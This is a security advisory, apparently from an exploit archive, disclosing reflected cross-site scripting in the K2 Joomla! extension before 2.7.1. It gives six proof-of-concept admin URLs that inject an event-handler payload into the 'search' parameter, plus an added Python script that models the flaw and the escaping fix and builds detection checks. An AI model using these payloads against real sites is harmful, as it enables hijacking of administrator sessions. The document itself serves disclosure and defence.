K2 Joomla! Extension Cross Site Scripting
Posted Aug 4, 2016
Authored by Manuel Mancera

K2 Joomla! extension versions prior to 2.7.1 suffer from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | a3fc93581f4ead8a4b1dbb2062c9656ac81bf9a53d8937c89a7c7a7b4db0204f

================================================================
K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting
================================================================

Information
--------------------
Name: K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting
Affected Software : K2
Affected Versions: < 2.7.1
Vendor Homepage : https://getk2.org/
http://extensions.joomla.org/extension/k2
Vulnerability Type : Reflected Cross Site Scripting
Severity : Medium
CVE: n/a


Product
--------------------
K2 is a content construction extension for Joomla!: it lets administrators
manage site content (items, categories, tags, comments, users and extra
fields) from the Joomla! administration panel and renders that content on
the website.


Description
--------------------
The K2 administrator panel suffers from multiple reflected cross site
scripting vulnerabilities: the `search` parameter of several admin views is
echoed back into the page without HTML escaping. An attacker could trick an
administrator into opening a malicious URL and steal their session cookie,
or redirect them to a malicious site to open up further attack vectors
(e.g. launch exploits against their browser). The XSS only triggers for an
authenticated administrator, so the range of attacks is limited, but it is
still a risk.


Fix commit:
https://github.com/getk2/k2/commit/c78f929dd3fcd4c55ba614ef8e789b944c30dc8d


Proof of Concept
----------------
PoC:
http://localhost/administrator/index.php?option=com_k2&view=comments&search=" onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=categories&search=" onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=users&search=" onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=extrafields&search=" onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=items&search=" onmouseover="alert(document.domain)"/>

PoC:
http://localhost/administrator/index.php?option=com_k2&view=tags&search=" onmouseover="alert(document.domain)"/>
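The PoC URLs above all rely on the same attribute breakout: the leading `"` closes the `value="..."` attribute of the admin search box and the rest adds an event handler. The following example is added here and is not the advisory's or K2's code: it models the vulnerable rendering and the escaped form of the fix, builds the six PoC URLs with the payload percent-encoded (the advisory prints it raw), and gives a check a tester can run over a fetched response body. The `render_*` templates and the `BASE` host are assumptions, not K2's real PHP.

```python
import html
from urllib.parse import urlencode, urlsplit, parse_qs

# Payload taken from the advisory's PoC URLs: the leading quote closes the
# value="..." attribute of the search box, the rest adds an event handler and
# closes the tag early.
PAYLOAD = '" onmouseover="alert(document.domain)"/>'

# The six admin views the advisory lists as reflecting the `search` parameter.
VIEWS = ["comments", "categories", "users", "extrafields", "items", "tags"]

# Same host as the advisory's PoCs; assumed for illustration.
BASE = "http://localhost/administrator/index.php"


def poc_url(view, payload=PAYLOAD):
    """Build a PoC URL with the payload percent-encoded, as a browser would send it.
    Encoding avoids the space and the '"' being mangled by the client or a proxy."""
    return BASE + "?" + urlencode({"option": "com_k2", "view": view, "search": payload})


def search_param(url):
    """Recover the decoded `search` parameter from a URL (what the server sees)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("search", [""])[0]


def render_vulnerable(search):
    """Assumed model of the pre-2.7.1 admin view (not K2's real template code):
    the search term is echoed into the attribute without escaping."""
    return '<input type="text" name="search" value="%s" />' % search


def render_fixed(search):
    """Same view with HTML-attribute escaping. quote=True is what matters here:
    turning '"' into &quot; means the payload can no longer close the attribute.
    2.7.1 fixed this class of bug; the exact PHP differs (see the fix commit)."""
    return '<input type="text" name="search" value="%s" />' % html.escape(search, quote=True)


def reflects_unescaped(body, payload=PAYLOAD):
    """Verification check for a fetched admin page: the payload appearing verbatim
    means the quote survived and the injected handler sits in the tag's attribute
    list. An escaped reflection (&quot; onmouseover=...) is not a finding."""
    return payload in body


def audit_views(render):
    """Run all six PoCs against a page renderer and report which reflect unescaped.
    Against a live target, replace `render` with an authenticated GET of
    poc_url(view) (the admin panel needs a logged-in administrator session)
    and pass the response body to reflects_unescaped()."""
    return {view: reflects_unescaped(render(search_param(poc_url(view)))) for view in VIEWS}


if __name__ == "__main__":
    print("vulnerable:", audit_views(render_vulnerable))
    print("fixed:     ", audit_views(render_fixed))
```

Note that the check looks for the raw payload, not for `onmouseover` alone: a patched page still contains the string `onmouseover` inside the escaped attribute value, so matching on the handler name would produce a false positive.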




Solution
--------------------
Update to the latest release (2.7.1 or later).

More info:
https://getk2.org/blog/2571-k2-v271-released

https://vel.joomla.org/resolved/1858-k2-2-7-0-xss-cross-site-scripting


Advisory Timeline
--------------------

26/07/2016 - Informed the vendor about the issue.
26/07/2016 - Vendor answered me and tried to persuade me that the XSS is
not a vulnerability. He said: "Just because you can run a piece of JS
somewhere doesn't mean it's a security issue." WTF
28/07/2016 - Informed Joomla VEL about the issue.
29/07/2016 - Joomla VEL confirmed it and wrote to me that the vendor will fix it.
29/07/2016 - Vendor confirmed the vulnerability to me. LOL
04/08/2016 - Vendor fixed it in the latest release.
04/08/2016 - Public disclosure.


Definitely, sometimes full disclosure is better than responsible
disclosure.



Credits & Authors
--------------------
Manuel Mancera (@sinkmanu)



Disclaimer
-------------------
All information is provided without warranty. The intent is to provide
information to secure infrastructure and/or systems, not to enable attacks
or damage. Therefore A2Secure shall not be liable for any direct or
indirect damages that might be caused by using this information.